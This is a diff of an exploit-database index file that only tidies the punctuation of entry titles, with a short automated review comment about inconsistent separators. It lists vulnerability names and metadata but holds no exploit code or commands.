+1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0
 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0
 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0
 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0
@@ -1152,7 +1152,7 @@ id,file,description,date,author,platform,type,port
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21
-1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
+1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0
 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0
 1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0
@@ -1210,7 +1210,7 @@ id,file,description,date,author,platform,type,port
 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21
 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21
 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0
-1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0
+1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0
 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25
 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0
 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0
@@ -1934,7 +1934,7 @@ id,file,description,date,author,platform,type,port
 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0
 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0
 2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0
-2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0
+2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0
 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
@@ -2215,7 +2215,7 @@ id,file,description,date,author,platform,type,port
 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0
 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0
-2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
+2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0
 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0
 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
@@ -2385,7 +2385,7 @@ id,file,description,date,author,platform,type,port
 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0
 2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0
 2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0
-2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0
+2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0
 2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0
 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0
 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0
@@ -3017,7 +3017,7 @@ id,file,description,date,author,platform,type,port
 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0
 3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0
 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0
-3350,platforms/windows/dos/3350.html,"BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0
+3350,platforms/windows/dos/3350.html,"BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0
 3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0
 3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0
 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0
@@ -3073,14 +3073,14 @@ id,file,description,date,author,platform,type,port
 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0
-3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0
+3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
-3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
-3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
+3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
+3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0
 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0
 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0
@@ -3162,7 +3162,7 @@ id,file,description,date,author,platform,type,port
 3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0
 3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0
 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0
-3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0
+3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0
 3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0
 3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0
 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0
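Review bot: The new titles for 3413 and 3414 keep the stray ` - / ` between the two version bounds and add a second ` - `, giving `PHP < 4.4.5 - / 5.2.1 - php_binary …`, while the rename of 3407 in this same hunk (and of 3499 in the hunk just below) moves the single dash after the second version, `Asterisk <= 1.2.15 / 1.4.0 - pre-auth …`. For consistency I would change the two added lines to `"PHP < 4.4.5 / 5.2.1 - php_binary Session Deserialization Information Leak"` and `"PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak"`. The same double-separator form appears for 3571 and 3572 in a later hunk of this diff. If anything downstream splits the description on the first ` - ` to separate product/version from the exploit summary, which the surrounding renames suggest is the convention, these two entries would be split in the wrong place.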
@@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port
 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0
 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0
 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0
-3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
+3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0
 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0
 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0
@@ -3227,13 +3227,13 @@ id,file,description,date,author,platform,type,port
 3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0
 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0
 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0
-3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0
+3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0
 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0
 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0
 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0
 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21
-3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
-3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
+3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
+3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
@@ -3246,7 +3246,7 @@ id,file,description,date,author,platform,type,port
 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0
 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0
 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0
-3586,platforms/linux/dos/3586.php,"PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
+3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0
 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0
 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80
@@ -3263,11 +3263,11 @@ id,file,description,date,author,platform,type,port
 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0
 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0
 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0
-3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0
+3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0
 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
 3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0
 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0
-3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0
+3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0
 3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0
 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0
 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0
@@ -3843,7 +3843,7 @@ id,file,description,date,author,platform,type,port
 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0
 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0
 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0
-4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
+4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0
 4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0
 4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0
@@ -3998,7 +3998,7 @@ id,file,description,date,author,platform,type,port
 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0
 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0
 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0
-4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0
+4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0
 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0
 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0
 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0
@@ -4038,7 +4038,7 @@ id,file,description,date,author,platform,type,port
 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0
 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0
 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0
-4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
+4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0
 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
@@ -4098,7 +4098,7 @@ id,file,description,date,author,platform,type,port
 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80
 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0
 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0
-4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0
+4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0
 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0
 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0
 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0
@@ -4596,7 +4596,7 @@ id,file,description,date,author,platform,type,port
 4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0
 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0
-4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0
+4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0
 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0
 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0
 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0
@@ -4786,7 +4786,7 @@ id,file,description,date,author,platform,type,port
 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0
-5149,platforms/php/webapps/5149.txt,"sCssBoard (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
+5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - RFI",2008-02-18,Crackers_Child,hardware,remote,0
 5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0
 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0
@@ -5028,7 +5028,7 @@ id,file,description,date,author,platform,type,port
 5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0
 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
-5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
+5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0
@@ -5196,7 +5196,7 @@ id,file,description,date,author,platform,type,port
 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0
